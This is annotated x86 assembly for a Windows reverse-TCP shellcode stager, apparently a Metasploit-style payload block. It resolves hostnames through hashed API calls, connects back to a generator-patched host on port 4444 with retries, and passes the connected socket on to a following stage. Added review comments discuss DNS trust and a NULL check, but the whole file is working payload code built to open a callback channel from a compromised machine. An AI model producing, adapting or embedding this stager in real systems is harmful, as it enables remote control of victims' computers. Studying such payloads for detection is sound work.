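;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
;-----------------------------------------------------------------------------;
[BITS 32]

; Reverse-TCP connect block that resolves the target by DNS name at runtime.
; Loads ws2_32, initialises Winsock, creates a TCP socket, resolves the
; NUL-terminated 'hostname' string at the end of this block with
; gethostbyname(), then calls connect() up to five times. On an unrecoverable
; failure (name lookup returned NULL, or all retries failed) it calls
; ExitProcess instead of returning; on success it falls through 'connected:'.
;
; Input:    EBP must be the address of 'api_call'.
; Output:   EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
;
; Review notes:
;  * The peer is located by an unauthenticated gethostbyname() lookup and is
;    never verified, so whoever controls the client's DNS answers controls
;    where this connects.
;  * Failed connect() attempts are retried immediately; there is no delay.
;  * The port (4444, hardcoded in the sockaddr push) and the 'hostname' bytes
;    are patched in by the generator. Anything that locates 'hostname' by byte
;    offset must be regenerated if instructions are added before it — the
;    gethostbyname NULL check below adds 4 bytes compared to the original.

reverse_tcp:
  push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
  push 0x5F327377        ; ...
  push esp               ; Push a pointer to the "ws2_32" string on the stack.
  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
  call ebp               ; LoadLibraryA( "ws2_32" )

  mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
  sub esp, eax           ; alloc some space for the WSAData structure
  push esp               ; push a pointer to this struct
  push eax               ; push the wVersionRequested parameter (0x0190 reused for size)
  push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
  call ebp               ; WSAStartup( 0x0190, &WSAData );

  ; The six WSASocketA arguments below assume WSAStartup returned 0; if it did
  ; not, the socket call gets non-zero flags/protocol args, which is expected
  ; to surface as a failed connect() and end in the 'failure' path.
  push eax               ; if we succeed, eax will be zero, push zero for the flags param.
  push eax               ; push null for reserved parameter
  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
  push eax               ; we do not specify a protocol
  inc eax                ;
  push eax               ; push SOCK_STREAM
  inc eax                ;
  push eax               ; push AF_INET
  push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
  call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
  xchg edi, eax          ; save the socket for later, don't care about the value of eax after this

get_address:
  jmp get_hostname       ; 'call got_hostname' leaves &hostname on the stack as the argument

got_hostname:
  push 0x803428A9        ; hash( "ws2_32.dll", "gethostbyname" )
  call ebp               ; gethostbyname( "name" );
  test eax, eax          ; NULL means the lookup failed: there is no hostent to read
  jz short failure       ; exit cleanly instead of faulting on [NULL+28] below

set_address:
  mov eax, [eax+28]      ; names (the resolved IPv4 address, read from the hostent buffer)
                         ; NOTE(review): this reads a fixed offset into ws2_32's hostent
                         ; buffer rather than walking h_addr_list — confirm against the
                         ; hostent layout before relying on it elsewhere.
  push byte 0x05         ; retry counter
  push eax               ; host address
  push 0x5C110002        ; family AF_INET and port 4444
  mov esi, esp           ; save pointer to sockaddr struct

try_connect:
  push byte 16           ; length of the sockaddr struct
  push esi               ; pointer to the sockaddr struct
  push edi               ; the socket
  push 0x6174A599        ; hash( "ws2_32.dll", "connect" )
  call ebp               ; connect( s, &sockaddr, 16 );

  test eax,eax           ; non-zero means a failure
  jz short connected

handle_failure:
  dec dword [esi+8]      ; retry counter sits just above the 8-byte sockaddr
  jnz short try_connect  ; retry immediately; no back-off

failure:
  push 0x56A2B5F0        ; hardcoded to exitprocess for size
  call ebp

get_hostname:
  call got_hostname      ; pushes the address of 'hostname' as gethostbyname's argument

hostname:
  ; Placeholder patched by the generator. It must stay NUL-terminated and must
  ; not grow past the space reserved here.
  db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", 0x00

connected:
                         ; falls through into whatever block follows with EDI = connected socket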